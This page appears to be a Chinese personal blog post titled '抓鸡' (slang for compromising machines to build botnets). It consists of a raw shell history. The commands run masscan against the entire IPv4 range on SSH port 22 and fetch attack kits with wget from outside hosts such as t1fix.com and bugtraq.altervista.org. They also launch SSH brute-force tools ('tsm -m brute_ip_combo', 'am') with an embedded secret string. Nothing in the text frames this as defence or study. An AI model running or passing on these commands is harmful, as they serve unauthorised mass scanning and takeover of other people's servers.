读思码

日常记录


抓鸡

<pre><code>w ls cd tsm ls cat output.txt ./masscan -p22 ./masscan -p22 -o all.txt ./masscan help ls ./masscan --help ./masscan -p22 -c all.txt ./masscan -p 22 -c all.txt ./masscan -p 22 -c all.txt --range 0.0.0.0-255.255.255.255 ./masscan -p 22 -c all.txt --range 0.0.0.0 --exclude 255.255.255.255 ./masscan -p22 --range 1.0.0.0-250.0.0.200 ./masscan -p22 --range 1.0.0.0 -exclude 250.0.0.200 ./masscan -p22 --range 1.0.0.0 -exclude 250.0.0.200 -c all.txt ./masscan -p22 --range 1.0.0.0 -exclude 255.255.255.200 -c all.txt ls masscan 1.0.0.0/255.255.255.255 -p22 -oX all ./masscan 1.0.0.0/255.255.255.255 -p22 -oX all ./masscan 0.0.0.0/0 -p0-65535 --excludefile exclude.txt ./masscan 0.0.0.0/0 -p0-65535 -oX scan.xml ./masscan 0.0.0.0/255.255.255.255 -p0-65535 -oX scan.xml ./masscan 0.0.0.0-255.255.255.255 -p0-65535 -oX scan.xml ./masscan 0.0.0.0 --exclude 255.255.255.255 -p0-65535 -oX scan.xml ls cat scan.xml ./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-eth ./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-8 w ifconfig ls ls -a cat .bash_history wget wget t1fix.com/jd3ad3.tar ls tar zxvf jd3ad3.tar tar xvf jd3ad3.tar cd tsm ls cat st ls ls -a cat z ls ls -a cd z ls ls -a cd .. ls ./masscan ./masscan -p80 ./masscan -p80 10.0.0.0/8 -Ob all ls ./masscan ./masscan -p 22 ./masscan -p 22 -- masscan --nmap ls cat help ./am -f ALL -p 22 -r 15000 -v -e e 'yourpass' ./am -f ALL -p 22 -r 15000 -v -e e 'gv%yFD4v{.6P?o+Akg?%r$r}fN' ./am -f ALL -p 22 -r 15000 -v -e e gv%yFD4v{.6P?o+Akg?%r$r}fN ./tms -m brute_ip_combo -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' ./tsm -m brute_ip_combo -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' ./am -f ALL -p 22 -e e -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' su nano a exit ls cd tsm ls ./masscan -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-eth ./am -f ALL -p 22 -e e -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' nmap apt install nmap sudo apt-get install git gcc make libpcap-dev make -j MAKE make ./am -f ALL -p 22 -e e -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' ./masscan -p22,80,445 192.168.1.0/24 cd .. ls cd .shadow ls nano go ls ls -a cd .shadow ls chmod +x * nano go ls ./go 103 ifconfig nano go ls ./go 103 w ls cd .. cd tsm ls ./massscan -p 22 200.0.0.0/24 ls ./masscan -p 22 200.0.0.0/24 ldd ldd am ls cat /etc/issue uname -a w ls ./am -help sudo apt-get install git gcc make libpcap-dev yum upgrade apt-get upgrade ls git clone https://github.com/robertdavidgraham/masscan mkdir mass cd mass git clone https://github.com/robertdavidgraham/masscan ls cd masssscan ls cd masscan ls make make -j ls yum install tmp/crypto-base64.o apt-get install crypto-base64.o ls cd /tmp ls sudo apt-get install clang-3.5 llvm sudo apt-get install clang git clone https://github.com/robertdavidgraham/masscan cd masscan make make -j masscan -p80,22,8080 10.0.0.0/8 ./masscan -p80,22,8080 10.0.0.0/8 ls apt install masscan masscan -p80,22,8080 10.0.0.0/8 ls make masscan -p80,22,8080 10.0.0.0/8 masscan -p22 10.0.0.0/8 ./c 84.200 clear wget http://bugtraq.altervista.org/22/80-90.txt ls mv pscan2 class ./c 84.200 ls ./tms -m brute_ip_combo -pf p -f AUTO -p 22 -t 10 -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' -d 2 ls ./tsm ./tsm -m brute_ip_combo -pf p -f AUTO -p 22 -t 10 -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' -d 2 nano p ./tsm -m brute_ip_combo -pf p -f AUTO -p 22 -t 10 -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' -d 2 ././pscan2 84 22 200 ifconfig nano a nano c chmod +x * ./c 84.200 ls ./c suddo su sudo su ./a 84.200 ls .&amp;amp;a ./a ./am -f ALL -p 22 -e e -v 'gv%yFD4v{.6P?o+Akg?%r$r}fN' wget http://bugtraq.altervista.org/pscan2 nano p nano a chmod +x * ./a 84.200 ls clear ls touch v nano v cat v ccat v cat v ls cat v</code></pre>

页面列表

ITEM_HTML